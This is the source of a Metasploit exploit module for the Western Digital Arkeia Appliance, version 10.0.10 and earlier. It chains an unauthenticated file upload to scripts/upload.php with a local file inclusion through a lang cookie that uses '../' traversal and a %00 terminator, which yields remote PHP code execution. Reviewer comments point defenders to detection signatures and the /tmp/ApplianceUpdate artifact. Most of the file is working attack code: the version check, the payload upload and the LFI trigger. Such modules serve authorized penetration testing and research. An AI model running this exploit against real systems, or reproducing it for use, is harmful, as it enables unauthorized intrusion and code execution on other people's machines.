Path: blob/master/modules/exploits/unix/webapp/arkeia_upload_exec.rb
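##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for the Western Digital Arkeia Appliance upload + local
# file inclusion issue (OSVDB 97614 / 97615, EDB 28330).
#
# Reviewer notes for defenders, taken from what this file itself does:
# * Two unauthenticated requests are made: a multipart POST to
#   <base>/scripts/upload.php and a GET of the base path whose `lang` cookie
#   holds `../` sequences followed by `%00`. Either is a usable detection
#   signature at a proxy or WAF that inspects request paths and cookies.
# * The uploaded content lands in /tmp/ApplianceUpdate, which the module
#   registers for cleanup, so the file may no longer be present on a host
#   examined after the fact.
# * The module description states the issues are fixed in version 10.1.10.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Registers the module metadata and the single TARGETURI option.
  #
  # @param info [Hash] metadata overrides supplied by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name' => "Western Digital Arkeia Remote Code Execution",
      'Description' => %q{
        This module exploits a vulnerability found in Western Digital Arkeia Appliance
        version 10.0.10 and lower. By abusing the upload.php script,
        a malicious user can upload arbitrary code to the ApplianceUpdate file in the temp
        directory without authentication. Abusing the local file inclusion in the lang
        cookie to parse this file results in arbitrary code execution, also without
        authentication. The module has been tested successfully on Arkeia 10.0.10. The issues
        have been fixed in version 10.1.10.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
        ],
      'References' =>
        [
          [ 'OSVDB', '97614' ],
          [ 'OSVDB', '97615' ],
          [ 'EDB', '28330' ]
        ],
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Targets' =>
        [
          ['Western Digital Arkeia Appliance 10.0.10', {}]
        ],
      'Privileged' => false,
      'DisclosureDate' => '2013-09-16',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the Arkeia Appliance', '/'])
      ])
  end

  # @return [String] the path component of the configured TARGETURI
  def uri
    target_uri.path
  end

  # Fingerprints the appliance without uploading anything.
  #
  # Step 1 reads a `vX.Y.Z` banner from the base page; step 2 re-requests the
  # page with `lang=fr` and looks for a French string, i.e. it confirms that
  # the `lang` cookie still selects which language file is loaded.
  #
  # @return [Exploit::CheckCode] Unknown when no 200 response with a version
  #   banner is received, Safe when the version is newer than 10.0.10 or the
  #   French string is absent, Appears otherwise
  def check
    # Check version
    print_status("Trying to detect installed version")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri)
    })

    unless res && res.code == 200 && res.body =~ /v(\d+\.\d+\.\d+)/
      return Exploit::CheckCode::Unknown
    end

    version = Regexp.last_match(1)

    vprint_status("Version #{version} detected")

    # Compare as versions, not as strings: lexicographically "10.0.9" and
    # "9.0.0" both sort after "10.0.10", so a plain String comparison would
    # report those affected releases as Safe (a false negative when this
    # check is used for vulnerability assessment). The regex above guarantees
    # three numeric components, so Gem::Version.new cannot raise here.
    if Gem::Version.new(version) > Gem::Version.new('10.0.10')
      return Exploit::CheckCode::Safe
    end

    # Check for vulnerable component
    vprint_status("Trying to detect the vulnerable component")

    res = send_request_cgi({
      'method' => 'GET',
      'headers' => { 'Cookie' => "lang=fr" },
      'uri' => normalize_uri(uri)
    })

    if res && res.code == 200 && res.body =~ /Les versions brutes des messages est affichee ci-dessous/
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  # Uploads the encoded payload through scripts/upload.php and then requests
  # the base page with a `lang` cookie that points at the uploaded file.
  #
  # Aborts via fail_with when the upload request gets no response or a
  # non-200 response.
  def exploit
    payload_name = rand_text_alpha(rand(10) + 5)

    post_data = Rex::MIME::Message.new
    post_data.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"UPLOAD\"; filename=\"#{payload_name}\"")
    file = post_data.to_s
    file.strip!

    print_status("Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, "scripts", "upload.php"),
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'data' => file
    })

    # If the server returns 200 we assume we uploaded the malicious
    # file successfully
    unless res && res.code == 200
      # Failure::None was passed here originally, which labels an aborted run
      # as "no failure"; report why the run stopped instead.
      reason = res ? Failure::UnexpectedReply : Failure::Unreachable
      fail_with(reason, "#{peer} - File wasn't uploaded, aborting!")
    end

    # On-disk artefact of a run; removed by FileDropper once a session exists.
    register_files_for_cleanup("/tmp/ApplianceUpdate")

    print_status("Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate")
    # NOTE(review): the trailing %00 presumably truncates a suffix that the
    # appliance appends to the cookie value before including it; the server
    # side is not visible from this file.
    res = send_request_cgi({
      'method' => 'GET',
      'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" },
      'uri' => normalize_uri(uri)
    })

    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either. A missing response is not reported here;
    # only a non-200 reply is flagged.
    if res && res.code != 200
      print_error("Unexpected response, probably the exploit failed")
    end
  end
end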